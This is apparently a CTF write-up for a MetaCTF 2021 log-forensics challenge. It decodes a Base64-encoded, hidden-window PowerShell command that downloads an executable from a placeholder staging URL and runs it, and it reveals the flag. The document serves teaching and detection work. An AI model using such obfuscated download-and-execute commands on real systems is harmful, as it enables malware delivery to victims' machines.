# MetaCTF 2021
## My Logs Know What You Did (125pts)
### Description:
>While investigating an incident, you identify a suspicious powershell command that was run on a compromised system ... can you figure out what it was doing?
`C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -sta -w 1 -enc TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn`

### Step 1 - Understanding the Command:
In this Powershell command, we can see it runs a command but it appears to be encoded. The `-enc` flag encodes the payload in Base64, so we can throw it into a Base64 decoder and extact some data.

### Step 2 - Decode Base64

By using just the encoded payload portion as our input, we can now read the unencoded payload and determine what it's doing.

If it was a real sample, this command would download a executable file from a staging site and start the process on the victim machine.

<details>
<summary> Flag Spoiler </summary>
MetaCTF{super_sus_st4ging_site_d0t_c0m}
</details>

## Learning Takeaways
We learned about Powershell encoding functionality, and even further we learned that obfuscation can be achieved in the command flags like `-noP` because Powershell handles parameter binding in a way that essentially auto-completes the intended flag. More can be found [here](https://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier).

Original writeup (https://github.com/team23ctf/writeups/blob/main/metactf2021/My%20Logs%20Know%20What%20You%20Did/My%20Logs%20Know%20What%20You%20Did.md).